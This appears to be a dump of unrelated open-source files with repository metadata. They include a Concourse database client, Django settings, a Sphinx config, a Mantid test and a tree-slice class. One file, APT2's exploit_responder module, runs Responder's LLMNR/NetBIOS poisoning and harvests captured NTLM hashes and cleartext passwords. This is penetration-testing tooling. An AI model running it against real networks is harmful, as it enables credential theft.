data = self.client.getKeyCclTime(keys, criteria, timestamp, self.creds, self.transaction,
self.environment)
elif keys and criteria and timestamp and timestr:
data = self.client.getKeyCclTimestr(keys, criteria, timestamp, self.creds, self.transaction,
self.environment)
elif keys and isinstance(records, list) and not timestamp:
data = self.client.getKeyRecords(keys, records, self.creds, self.transaction, self.environment)
elif keys and records and not timestamp:
data = self.client.getKeyRecord(keys, records, self.creds, self.transaction, self.environment)
elif keys and isinstance(records, list) and timestamp and not timestr:
data = self.client.getKeyRecordsTime(keys, records, timestamp, self.creds, self.transaction,
self.environment)
elif keys and isinstance(records, list) and timestamp and timestr:
data = self.client.getKeyRecordsTimestr(keys, records, timestamp, self.creds, self.transaction,
self.environment)
elif keys and records and timestamp and not timestr:
data = self.client.getKeyRecordTime(keys, records, timestamp, self.creds, self.transaction,
self.environment)
elif keys and records and timestamp and timestr:
data = self.client.getKeyRecordTimestr(keys, records, timestamp, self.creds, self.transaction,
self.environment)
else:
require_kwarg('criteria or (key and record)')
return pythonify(data)
def get_server_environment(self):
""" Return the environment to which the client is connected.
:return: the environment
"""
return self.client.getServerEnvironment(self.creds, self.transaction, self.environment)
def get_server_version(self):
""" Return the version of Concourse Server to which the client is connected. Generally speaking, a client cannot
talk to a newer version of Concourse Server.
:return: the server version
"""
return self.client.getServerVersion()
def insert(self, data, records=None, **kwargs):
""" Bulk insert data from a dict, a list of dicts or a JSON string. This operation is atomic, within each record.
An insert can only succeed within a record if all the data can be successfully added, which means the insert
will fail if any aspect of the data already exists in the record.
If no record or records are specified, the following behaviour occurs
- data is a dict or a JSON object:
The data is inserted into a new record
- data is a list of dicts or a JSON array of objects:
Each dict/object is inserted into a new record
If a record or records are specified, the data must be a JSON object or a dict. In this case, the object/dict is
inserted into every record specified as an argument to the function.
:param data (dict | list | string):
:param record (int) or records(list):
:return: the list of records into which data was inserted, if no records are specified as method arguments.
Otherwise, a bool indicating whether the insert was successful if a single record is specified as an argument
or a dict mapping each specified record to a bool that indicates whether the insert was successful for that
record
"""
data = data or kwargs.get('json')
records = records or kwargs.get('record')
if isinstance(data, dict) or isinstance(data, list):
data = ujson.dumps(data)
if isinstance(records, list):
result = self.client.insertJsonRecords(data, records, self.creds, self.transaction, self.environment)
elif records:
result = self.client.insertJsonRecord(data, records, self.creds, self.transaction, self.environment)
else:
result = self.client.insertJson(data, self.creds, self.transaction, self.environment)
result = list(result) if isinstance(result, set) else result
return result
def inventory(self):
""" Return a list of all the records that have any data.
:return: the inventory
"""
data = self.client.inventory(self.creds, self.transaction, self.environment)
return list(data) if isinstance(data, set) else data
def jsonify(self, records=None, include_id=False, timestamp=None, **kwargs):
"""
:param records:
:param include_id:
:param timestamp:
:param kwargs:
:return:
"""
records = records or kwargs.get('record')
records = list(records) if not isinstance(records, list) else records
timestamp = timestamp or find_in_kwargs_by_alias('timestamp', kwargs)
include_id = include_id or kwargs.get('id', False)
timestr = isinstance(timestamp, basestring)
if not timestamp:
return self.client.jsonifyRecords(records, include_id, self.creds, self.transaction, self.environment)
elif timestamp and not timestr:
return self.client.jsonifyRecordsTime(records, timestamp, include_id, self.creds, self.transaction,
self.environment)
elif timestamp and timestr:
return self.client.jsonifyRecordsTimestr(records, timestamp, include_id, self.creds, self.transaction,
self.environment)
else:
require_kwarg('record or records')
def link(self, key, source, destinations=None, **kwargs):
"""
:param key:
:param source:
:param destinations:
:param destination:
:return:
"""
destinations = destinations or kwargs.get('destination')
if not isinstance(destinations, list):
return self.add(key, Link.to(destinations), source)
else:
data = dict()
for dest in destinations:
data[dest] = self.add(key, Link.to(dest), source)
return data
def logout(self):
"""
:return:
"""
self.client.logout(self.creds, self.environment)
def ping(self, records, **kwargs):
"""
:param records:
:return:
"""
records = records or kwargs.get('record')
if isinstance(records, list):
return self.client.pingRecords(records, self.creds, self.transaction, self.environment)
else:
return self.client.pingRecord(records, self.creds, self.transaction, self.environment)
def remove(self, key, value, records=None, **kwargs):
"""
:param key:
:param value:
:param records:
:return:
"""
value = python_to_thrift(value)
records = records or kwargs.get('record')
if isinstance(records, list):
return self.client.removeKeyValueRecords(key, value, records, self.creds, self.transaction,
self.environment)
elif isinstance(records, (int, long)):
return self.client.removeKeyValueRecord(key, value, records, self.creds, self.transaction, self.environment)
else:
require_kwarg('record or records')
def revert(self, keys=None, records=None, timestamp=None, **kwargs):
"""
:param keys:
:param records:
:param timestamp:
:return:
"""
keys = keys or kwargs.get('key')
records = records or kwargs.get('record')
timestamp = timestamp or find_in_kwargs_by_alias('timestamp', kwargs)
timestr = isinstance(timestamp, basestring)
if isinstance(keys, list) and isinstance(records, list) and timestamp and not timestr:
self.client.revertKeysRecordsTime(keys, records, timestamp, self.creds, self.transaction, self.environment)
elif isinstance(keys, list) and isinstance(records, list) and timestamp and timestr:
self.client.revertKeysRecordsTimestr(keys, records, timestamp, self.creds, self.transaction,
self.environment)
elif isinstance(keys, list) and records and timestamp and not timestr:
self.client.revertKeysRecordTime(keys, records, timestamp, self.creds, self.transaction, self.environment)
elif isinstance(keys, list) and records and timestamp and timestr:
self.client.revertKeysRecordTimestr(keys, records, timestamp, self.creds, self.transaction, self.environment)
elif isinstance(records, list) and keys and timestamp and not timestr:
self.client.revertKeyRecordsTime(keys, records, timestamp, self.creds, self.transaction, self.environment)
elif isinstance(records, list) and keys and timestamp and timestr:
self.client.revertKeyRecordsTimestr(keys, records, timestamp, self.creds, self.transaction, self.environment)
elif keys and records and timestamp and not timestr:
self.client.revertKeyRecordTime(keys, records, timestamp, self.creds, self.transaction, self.environment)
elif keys and records and timestamp and timestr:
self.client.revertKeyRecordTimestr(keys, records, timestamp, self.creds, self.transaction, self.environment)
else:
require_kwarg('keys, record and timestamp')
def search(self, key, query):
"""
:param key:
:param query:
:return:
"""
data = self.client.search(key, query, self.creds, self.transaction, self.environment)
data = list(data) if isinstance(data, set) else data
return data
def select(self, keys=None, criteria=None, records=None, timestamp=None, **kwargs):
"""
:param keys:
:param criteria:
:param records:
:param timestamp:
:return:
"""
criteria = criteria or find_in_kwargs_by_alias('criteria', kwargs)
keys = keys or kwargs.get('key')
records = records or kwargs.get('record')
timestamp = timestamp or find_in_kwargs_by_alias('timestamp', kwargs)
timestr = isinstance(timestamp, basestring)
# Handle case when kwargs are not used and the second parameter is a the record
# (e.g. trying to get key/record(s))
if (isinstance(criteria, int) or isinstance(criteria, list)) and not records:
records = criteria
criteria = None
if isinstance(records, list) and not keys and not timestamp:
data = self.client.selectRecords(records, self.creds, self.transaction, self.environment)
elif isinstance(records, list) and timestamp and not timestr and not keys:
data = self.client.selectRecordsTime(records, timestamp, self.creds, self.transaction, self.environment)
elif isinstance(records, list) and timestamp and timestr and not keys:
data = self.client.selectRecordsTimestr(records, timestamp, self.creds, self.transaction, self.environment)
elif isinstance(records, list) and isinstance(keys, list) and not timestamp:
data = self.client.selectKeysRecords(keys, records, self.creds, self.transaction, self.environment)
elif isinstance(records, list) and isinstance(keys, list) and timestamp and not timestr:
data = self.client.selectKeysRecordsTime(keys, records, timestamp, self.creds, self.transaction,
self.environment)
elif isinstance(records, list) and isinstance(keys, list) and timestamp and timestr:
data = self.client.selectKeysRecordsTimestr(keys, records, timestamp, self.creds, self.transaction,
self.environment)
elif isinstance(keys, list) and criteria and not timestamp:
data = self.client.selectKeysCcl(keys, criteria, self.creds, self.transaction, self.environment)
elif isinstance(keys, list) and criteria and timestamp and not timestr:
data = self.client.selectKeysCclTime(keys, criteria, timestamp, self.creds, self.transaction,
self.environment)
elif isinstance(keys, list) and criteria and timestamp and timestr:
data = self.client.selectKeysCclTimestr(keys, criteria, timestamp, self.creds, self.transaction,
self.environment)
elif isinstance(keys, list) and records and not timestamp:
data = self.client.selectKeysRecord(keys, records, self.creds, self.transaction, self.environment)
elif isinstance(keys, list) and records and timestamp and not timestr:
data = self.client.selectKeysRecordTime(keys, records, timestamp, self.creds, self.transaction,
self.environment)
elif isinstance(keys, list) and records and timestamp and timestr:
data = self.client.selectKeysRecordTimestr(keys, records, timestamp, self.creds, self.transaction,
self.environment)
elif criteria and not keys and not timestamp:
data = self.client.selectCcl(criteria, self.creds, self.transaction, self.environment)
elif criteria and timestamp and not timestr and not keys:
data = self.client.selectCclTime(criteria, timestamp, self.creds, self.transaction, self.environment)
elif criteria and timestamp and timestr and not keys:
data = self.client.selectCclTimestr(criteria, timestamp, self.creds, self.transaction, self.environment)
elif records and not keys and not timestamp:
data = self.client.selectRecord(records, self.creds, self.transaction, self.environment)
elif records and not isinstance(records, list) and timestamp and not timestr and not keys:
data = self.client.selectRecordTime(records, timestamp, self.creds, self.transaction, self.environment)
elif records and timestamp and not timestr and not keys:
data = self.client.selectRecordsTime(records, timestamp, self.creds, self.transaction, self.environment)
elif records and not isinstance(records, list) and timestamp and timestr and not keys:
data = self.client.selectRecordTimestr(records, timestamp, self.creds, self.transaction, self.environment)
elif isinstance(records, list) and timestamp and timestr and not keys:
data = self.client.selectRecordsTimestr(records, timestamp, self.creds, self.transaction, self.environment)
elif keys and criteria and not timestamp:
data = self.client.selectKeyCcl(keys, criteria, self.creds, self.transaction, self.environment)
elif keys and criteria and timestamp and not timestr:
data = self.client.selectKeyCclTime(keys, criteria, timestamp, self.creds, self.transaction,
self.environment)
elif keys and criteria and timestamp and timestr:
data = self.client.selectKeyCclTimestr(keys, criteria, timestamp, self.creds, self.transaction,
self.environment)
elif keys and isinstance(records, list) and not timestamp:
data = self.client.selectKeyRecords(keys, records, self.creds, self.transaction, self.environment)
elif keys and records and not timestamp:
data = self.client.selectKeyRecord(keys, records, self.creds, self.transaction, self.environment)
elif keys and isinstance(records, list) and timestamp and not timestr:
data = self.client.selectKeyRecordsTime(keys, records, timestamp, self.creds, self.transaction,
self.environment)
elif keys and isinstance(records, list) and timestamp and timestr:
data = self.client.selectKeyRecordsTimestr(keys, records, timestamp, self.creds, self.transaction,
self.environment)
elif keys and records and timestamp and not timestr:
data = self.client.selectKeyRecordTime(keys, records, timestamp, self.creds, self.transaction,
self.environment)
elif keys and records and timestamp and timestr:
data = self.client.selectKeyRecordTimestr(keys, records, timestamp, self.creds, self.transaction,
self.environment)
elif records and not isinstance(records, list) and not timestamp:
data = self.client.selectRecord(records, self.creds, self.transaction, self.environment)
elif records and not isinstance(records, list) and timestamp and not timestr:
data = self.client.selectRecordTime(records, timestamp, self.creds, self.transaction, self.environment)
elif records and not isinstance(records, list) and timestamp and timestr:
data = self.client.selectRecordTimestr(records, timestamp, self.creds, self.transaction, self.environment)
elif records and not timestamp:
data = self.client.selectRecords(records, self.creds, self.transaction, self.environment)
elif records and timestamp and not timestr:
data = self.client.selectRecordsTime(records, timestamp, self.creds, self.transaction, self.environment)
elif records and timestamp and timestr:
data = self.client.selectRecordsTimestr(records, timestamp, self.creds, self.transaction, self.environment)
else:
require_kwarg('criteria or record')
return pythonify(data)
def set(self, key, value, records=None, **kwargs):
"""
:param key:
:param value:
:param records:
:return:
"""
records = records or kwargs.get('record')
value = python_to_thrift(value)
if not records:
return self.client.setKeyValue(key, value, self.creds, self.transaction, self.environment)
elif isinstance(records, list):
self.client.setKeyValueRecords(key, value, records, self.creds, self.transaction, self.environment)
elif isinstance(records, (int, long)):
self.client.setKeyValueRecord(key, value, records, self.creds, self.transaction, self.environment)
else:
require_kwarg('record or records')
def stage(self):
"""
:return:
"""
self.transaction = self.client.stage(self.creds, self.environment)
def time(self, phrase=None):
"""
:param phrase:
:return:
"""
if phrase:
return self.client.timePhrase(phrase, self.creds, self.transaction, self.environment)
else:
return self.client.time(self.creds, self.transaction, self.environment)
def unlink(self, key, source, destinations=None, **kwargs):
"""
:param key:
:param source:
:param destination:
:return:
"""
destinations = destinations or kwargs.get('destination')
if not isinstance(destinations, list):
return self.remove(key=key, value=Link.to(destinations), record=source)
else:
data = dict()
for dest in destinations:
data[dest] = self.remove(key, Link.to(dest), source)
return data
def verify(self, key, value, record, timestamp=None, **kwargs):
value = python_to_thrift(value)
timestamp = timestamp or find_in_kwargs_by_alias('timestamp', kwargs)
timestr = isinstance(timestamp, basestring)
if not timestamp:
return self.client.verifyKeyValueRecord(key, value, record, self.creds, self.transaction, self.environment)
elif timestamp and not timestr:
return self.client.verifyKeyValueRecordTime(key, value, record, timestamp, self.creds, self.transaction,
self.environment)
elif timestamp and timestr:
return self.client.verifyKeyValueRecordTimestr(key, value, record, timestamp, self.creds, self.transaction,
self.environment)
def verify_and_swap(self, key=None, expected=None, record=None, replacement=None, **kwargs):
"""
:param key:
:param expected:
:param record:
:param replacement:
:return:
"""
expected = expected or find_in_kwargs_by_alias('expected', **kwargs)
replacement = replacement or find_in_kwargs_by_alias('replacement', **kwargs)
expected = python_to_thrift(expected)
replacement = python_to_thrift(replacement)
if key and expected and record and replacement:
return self.client.verifyAndSwap(key, expected, record, replacement, self.creds, self.transaction,
self.environment)
else:
require_kwarg('key, expected, record and replacement')
def verify_or_set(self, key, value, record):
"""
:param key:
:param value:
:param record:
:return:
"""
value = python_to_thrift(value)
return self.client.verifyOrSet(key, value, record, self.creds, self.transaction, self.environment)
| apache-2.0 |
OpenSPA/dvbapp | lib/python/Plugins/Extensions/TuxboxPlugins/pluginrunner.py | 33 | 1173 | from enigma import eDBoxLCD, eRCInput, fbClass, eConsoleAppContainer
from Screens.Screen import Screen
from Screens.MessageBox import MessageBox
class PluginRunner(Screen):
skin = """
<screen position="1,1" size="1,1" title="Plugin" >
</screen>"""
def __init__(self, session, pluginname, args = None):
self.skin = PluginRunner.skin
Screen.__init__(self, session)
self.container = eConsoleAppContainer()
self.container.appClosed.append(self.finishedExecution)
self.runPlugin(pluginname)
def runPlugin(self, pluginname):
eDBoxLCD.getInstance().lock()
eRCInput.getInstance().lock()
fbClass.getInstance().lock()
print "executing:", ("pluginlauncher -x %s" % pluginname)
if self.container.execute("pluginlauncher -x %s" % pluginname):
self.finishedExecution(None)
def finishedExecution(self, retval = 1):
print "PluginRunner retval:", retval
fbClass.getInstance().unlock()
eRCInput.getInstance().unlock()
eDBoxLCD.getInstance().unlock()
if retval is None or retval != 1:
self.session.openWithCallback(
self.finishedExecution,
MessageBox,
_("Error executing plugin") % (param)
)
else:
self.close()
| gpl-2.0 |
dymkowsk/mantid | Testing/SystemTests/tests/analysis/ReflectometryQuickPointDetector.py | 3 | 1181 | #pylint: disable=no-init
import stresstesting
from mantid.simpleapi import *
from isis_reflectometry import quick
class ReflectometryQuickPointDetector(stresstesting.MantidStressTest):
"""
This is a system test for the top-level quick routines. Quick is the name given to the
ISIS reflectometry reduction scripts. Uses the point detector functionality with real transmission corrections.
"""
def runTest(self):
defaultInstKey = 'default.instrument'
defaultInstrument = config[defaultInstKey]
try:
config[defaultInstKey] = 'INTER'
LoadISISNexus(Filename='13463', OutputWorkspace='13463')
LoadISISNexus(Filename='13464', OutputWorkspace='13464')
LoadISISNexus(Filename='13460', OutputWorkspace='13460')
transmissionRuns = '13463,13464'
runNo = '13460'
incidentAngle = 0.7
quick.quick(runNo, trans=transmissionRuns, theta=incidentAngle)
finally:
config[defaultInstKey] = defaultInstrument
def validate(self):
self.disableChecking.append('Instrument')
return '13460_IvsQ','QuickReferenceResult.nxs'
| gpl-3.0 |
MooseDojo/apt2 | modules/action/exploit_responder.py | 1 | 3558 | import datetime
import os
from core.actionModule import actionModule
from core.utils import Utils
from core.keystore import KeyStore as kb
class exploit_responder(actionModule):
def __init__(self, config, display, lock):
super(exploit_responder, self).__init__(config, display, lock)
self.title = "Run Responder and watch for hashes"
self.shortName = "Responder"
self.description = "execute [reponder -I eth0 -wrf]"
self.requirements = ["sqlite3", "responder"]
self.triggers = ["always"]
self.types = ["mitm"]
self.safeLevel = 3
self.maxThreads = 1
def process(self):
default_interface = self.config["responder_iface"]
default_delay = self.config["responder_delay"]
#responder_path = self.config["responder_path"]
my_ip = self.config["lhost"]
# TODO
# check to see if we got any creds
# if not, wait 5 minutes and run again for 15 minutes
# Extract usernames from results and add to KB
found_hash = False
times_run = 0
#while not found_hash and times_run < 4:
self.display.output("Starting responder...")
temp_file1 = self.config["proofsDir"] + self.shortName + "_" + Utils.getRandStr(10)
temp_file2 = self.config["proofsDir"] + self.shortName + "_" + Utils.getRandStr(10)
command = "python " + self.config["responder"] + " -I " + default_interface + " -i " + my_ip + " -wrf"
# run for 15 minutes
start_time = '{:%d-%m-%Y %H:%M:%S}'.format(datetime.datetime.now())
result = Utils.execWait(command, temp_file1, timeout=int(self.config["responder_timeout"]))
responder_path, temp1 = os.path.split(self.config["responder"])
responder_db = responder_path + "/Responder.db"
#STDOUT unreliable, grabbed hashes directly from the DB instead
command = self.config["sqlite3"] + " " + responder_db + " \"select * from responder where timestamp > '" + start_time + "'\""
result = Utils.execWait(command, temp_file2, timeout=10)
times_run += 1
#Have to account for responder not creating a new db file if nothing was found
if not "no such table" in result:
for part in result.splitlines():
found_hash = True #Found a hash, set to true to prevent loop
record = part.split('|')
if len(record) > 0:
method = record[1]
hashtype = record[2]
print "DEBUG-------------------------------" + hashtype
host = record[3]
username = record[5]
domain = username.split('\\')[0]
user = username.split('\\')[1]
cleartext = record[6]
shorthash = record[7]
fullhash = record[8]
self.display.error("Vuln [NetBIOS|LLMNR] Found new hash - ", fullhash)
self.addVuln(host, "NetBIOS|LLMNR", {"port": "445", "output": temp_file2.replace("/", "%2F")})
kb.add("creds/domain/" + domain + "/username/" + user + "/" + hashtype + "/" + fullhash)
if len(cleartext) > 0:
kb.add("creds/host/" + host + "/username/" + user + "/password/" + cleartext)
#if not found_hash:
# time.sleep(300) # sleep for 5 minutes
# repeat upto 5 4 times
if found_hash:
self.fire("newNTLMHash")
return
| mit |
CARocha/plataforma_fadcanic | plataforma_fadcanic/settings.py | 3 | 5677 | # -*- coding: utf-8 -*-
from local_settings import *
# Application definition
INSTALLED_APPS = (
'bootstrap_admin',
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.sites',
'django.contrib.messages',
'django.contrib.staticfiles',
'django.contrib.flatpages',
#cambiaahora
'cambiaahora.noticias',
'cambiaahora.historias',
'cambiaahora.multimedias',
'cambiaahora.staff',
'cambiaahora.testimonios',
'cambiaahora.configuracion',
#actividades
'actividades.contraparte',
'actividades.fadcanic',
'actividades.lugar',
'actividades.clippy',
#monitoreo
#'monitoreo.comunidad',
#caps violencia
'violencia_juvenil',
#mapeo actores
'mapeo',
#biblioteca
'biblioteca',
#extras apps
'ckeditor',
'smart_selects',
'sorl.thumbnail',
'embed_video',
'endless_pagination',
'multiselectfield',
'rest_framework',
'import_export',
)
MIDDLEWARE_CLASSES = (
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.locale.LocaleMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.auth.middleware.SessionAuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
'django.contrib.flatpages.middleware.FlatpageFallbackMiddleware',
)
ROOT_URLCONF = 'plataforma_fadcanic.urls'
SITE_ID = 1
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [os.path.join(BASE_DIR, 'templates')],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.contrib.auth.context_processors.auth',
'django.template.context_processors.debug',
'django.template.context_processors.i18n',
'django.template.context_processors.media',
'django.template.context_processors.static',
'django.template.context_processors.tz',
'django.contrib.messages.context_processors.messages',
'django.template.context_processors.request',
'plataforma_fadcanic.context.globales',
],
},
},
]
from django.conf.global_settings import TEMPLATE_CONTEXT_PROCESSORS
TEMPLATE_CONTEXT_PROCESSORS += (
'django.core.context_processors.request',
)
ENDLESS_PAGINATION_PER_PAGE = 6
WSGI_APPLICATION = 'plataforma_fadcanic.wsgi.application'
BOOTSTRAP_ADMIN_SIDEBAR_MENU = True
# Internationalization
# https://docs.djangoproject.com/en/1.7/topics/i18n/
LANGUAGE_CODE = 'es'
LANGUAGES = (
('es', 'Español'),
('en', 'English'),
)
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = False
LOCALE_PATHS = (
os.path.join(BASE_DIR, 'locale'),
)
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.7/howto/static-files/
MEDIA_ROOT = os.environ.get('MEDIA_ROOT', os.path.join(BASE_DIR, 'media'))
MEDIA_URL = '/media/'
STATIC_ROOT = os.environ.get('STATIC_ROOT', os.path.join(BASE_DIR, 'static'))
STATIC_URL = '/static/'
STATICFILES_DIRS = (
os.path.join(BASE_DIR, "static_media"),
)
#ckeditor
CKEDITOR_CONFIGS = {
'default': {
'extraPlugins': 'image2',
'toolbar': [
{ 'name': 'document', 'groups': [ 'mode', 'document', 'doctools' ], 'items': [ 'Source', '-', 'Save', 'NewPage', 'Preview', 'Print', '-', 'Templates' ] },
{ 'name': 'clipboard', 'groups': [ 'clipboard', 'undo' ], 'items': [ 'Cut', 'Copy', 'Paste', 'PasteText', 'PasteFromWord', '-', 'Undo', 'Redo' ] },
{ 'name': 'editing', 'groups': [ 'find', 'selection', 'spellchecker' ], 'items': [ 'Find', 'Replace', '-', 'SelectAll', '-', 'Scayt' ] },
#{ 'name': 'forms', 'items': [ 'Form', 'Checkbox', 'Radio', 'TextField', 'Textarea', 'Select', 'Button', 'ImageButton', 'HiddenField' ] },
'/',
{ 'name': 'basicstyles', 'groups': [ 'basicstyles', 'cleanup' ], 'items': [ 'Bold', 'Italic', 'Underline', 'Strike', 'Subscript', 'Superscript', '-', 'RemoveFormat' ] },
{ 'name': 'paragraph', 'groups': [ 'list', 'indent', 'blocks', 'align', 'bidi' ], 'items': [ 'NumberedList', 'BulletedList', '-', 'Outdent', 'Indent', '-', 'Blockquote', 'CreateDiv', '-', 'JustifyLeft', 'JustifyCenter', 'JustifyRight', 'JustifyBlock', '-', 'BidiLtr', 'BidiRtl', 'Language' ] },
{ 'name': 'links', 'items': [ 'Link', 'Unlink', 'Anchor' ] },
{ 'name': 'insert', 'items': [ 'Image', 'Youtube', 'Flash', 'Table', 'HorizontalRule', 'Smiley', 'SpecialChar', 'PageBreak', 'Iframe' ] },
'/',
{ 'name': 'styles', 'items': [ 'Styles', 'Format', 'Font', 'FontSize' ] },
{ 'name': 'colors', 'items': [ 'TextColor', 'BGColor' ] },
{ 'name': 'tools', 'items': [ 'Maximize', 'ShowBlocks', ] },
],
'height': 'auto',
'width': 'auto',
},
}
CKEDITOR_UPLOAD_PATH = "uploads/"
CKEDITOR_IMAGE_BACKEND = "pillow"
CKEDITOR_JQUERY_URL = '//ajax.googleapis.com/ajax/libs/jquery/2.1.1/jquery.min.js'
EXPORT_SERVER = ''
SITE_ID = 1
LOGIN_URL = '/login/'
LOGIN_REDIRECT_URL = '/actividades/'
SESSION_SERIALIZER = 'django.contrib.sessions.serializers.PickleSerializer'
REST_FRAMEWORK = {
'DEFAULT_PERMISSION_CLASSES': [
'rest_framework.permissions.DjangoModelPermissionsOrAnonReadOnly'
],
'PAGE_SIZE': 10
}
| mit |
gfreed/android_external_chromium-org | third_party/bintrees/bintrees/treeslice.py | 156 | 1950 | #!/usr/bin/env python
#coding:utf-8
# Author: mozman -- <mozman@gmx.at>
# Purpose: TreeSlice
# Created: 11.04.2011
# Copyright (c) 2010-2013 by Manfred Moitzi
# License: MIT License
class TreeSlice(object):
__slots__ = ['_tree', '_start', '_stop']
def __init__(self, tree, start, stop):
self._tree = tree
self._start = start
self._stop = stop
def __repr__(self):
tpl = "%s({%s})" % (self._tree.__class__.__name__, '%s')
return tpl % ", ".join( ("%r: %r" % item for item in self.items()) )
def __contains__(self, key):
if self._inrange(key):
return key in self._tree
else:
return False
def _inrange(self, key):
if self._start is not None and key < self._start:
return False
if self._stop is not None and key >= self._stop:
return False
return True
def __getitem__(self, key):
if isinstance(key, slice):
return self._subslice(key.start, key.stop)
if self._inrange(key):
return self._tree[key]
else:
raise KeyError(key)
def _subslice(self, start, stop):
def newstart():
if start is None:
return self._start
elif self._start is None:
return start
else:
return max(start, self._start)
def newstop():
if stop is None:
return self._stop
elif self._stop is None:
return stop
else:
return min(stop, self._stop)
return TreeSlice(self._tree, newstart(), newstop())
def keys(self):
return self._tree.keyslice(self._start, self._stop)
__iter__ = keys
def values(self):
return self._tree.valueslice(self._start, self._stop)
def items(self):
return self._tree.itemslice(self._start, self._stop)
| bsd-3-clause |
dixudx/rtcclient | doc/source/conf.py | 1 | 9623 | # -*- coding: utf-8 -*-
#
# rtcclient documentation build configuration file, created by
# sphinx-quickstart on Mon Aug 17 17:21:28 2015.
#
# This file is execfile()d with the current directory set to its
# containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
import sys
import os
import shlex
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
# sys.path.insert(0, os.path.abspath('.'))
sys.path.insert(0, os.path.abspath('../..'))
# -- General configuration ------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
# needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions = [
'sphinx.ext.autodoc',
'sphinx.ext.doctest',
'sphinx.ext.intersphinx',
'sphinx.ext.todo',
'sphinx.ext.coverage',
'sphinx.ext.ifconfig',
'sphinx.ext.viewcode',
]
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix(es) of source filenames.
# You can specify multiple suffix as a list of string:
# source_suffix = ['.rst', '.md']
source_suffix = '.rst'
# The encoding of source files.
# source_encoding = 'utf-8-sig'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = u'rtcclient'
copyright = u'2015, Di Xu'
author = u'Di Xu'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
version = '0.1.dev95'
# The full version, including alpha/beta/rc tags.
release = '0.1.dev95'
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#
# This is also used if you do content translation via gettext catalogs.
# Usually you set "language" from the command line for these cases.
language = 'en'
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
# today = ''
# Else, today_fmt is used as the format for a strftime call.
# today_fmt = '%B %d, %Y'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = []
# The reST default role (used for this markup: `text`) to use for all
# documents.
# default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
# add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
# add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
# show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# A list of ignored prefixes for module index sorting.
# modindex_common_prefix = []
# If true, keep warnings as "system message" paragraphs in the built documents.
# keep_warnings = False
# If true, `todo` and `todoList` produce output, else they produce nothing.
todo_include_todos = True
# -- Options for HTML output ----------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
html_theme = 'alabaster'
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
# html_theme_options = {}
# Add any paths that contain custom themes here, relative to this directory.
# html_theme_path = []
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
# html_title = None
# A shorter title for the navigation bar. Default is the same as html_title.
# html_short_title = None
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
# html_logo = None
# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
# html_favicon = None
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# Add any extra paths that contain custom files (such as robots.txt or
# .htaccess) here, relative to this directory. These files are copied
# directly to the root of the documentation.
# html_extra_path = []
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
# html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
# html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
# html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
# html_additional_pages = {}
# If false, no module index is generated.
# html_domain_indices = True
# If false, no index is generated.
# html_use_index = True
# If true, the index is split into individual pages for each letter.
# html_split_index = False
# If true, links to the reST sources are added to the pages.
# html_show_sourcelink = True
# If true, "Created using Sphinx" is shown in the HTML footer. Default is True.
# html_show_sphinx = True
# If true, "(C) Copyright ..." is shown in the HTML footer. Default is True.
# html_show_copyright = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
# html_use_opensearch = ''
# This is the file name suffix for HTML files (e.g. ".xhtml").
# html_file_suffix = None
# Language to be used for generating the HTML full-text search index.
# Sphinx supports the following languages:
# 'da', 'de', 'en', 'es', 'fi', 'fr', 'hu', 'it', 'ja'
# 'nl', 'no', 'pt', 'ro', 'ru', 'sv', 'tr'
# html_search_language = 'en'
# A dictionary with options for the search language support, empty by default.
# Now only 'ja' uses this config value
# html_search_options = {'type': 'default'}
# The name of a javascript file (relative to the configuration directory) that
# implements a search results scorer. If empty, the default will be used.
# html_search_scorer = 'scorer.js'
# Output file base name for HTML help builder.
htmlhelp_basename = 'rtcclientdoc'
# -- Options for LaTeX output ---------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
# 'papersize': 'letterpaper',
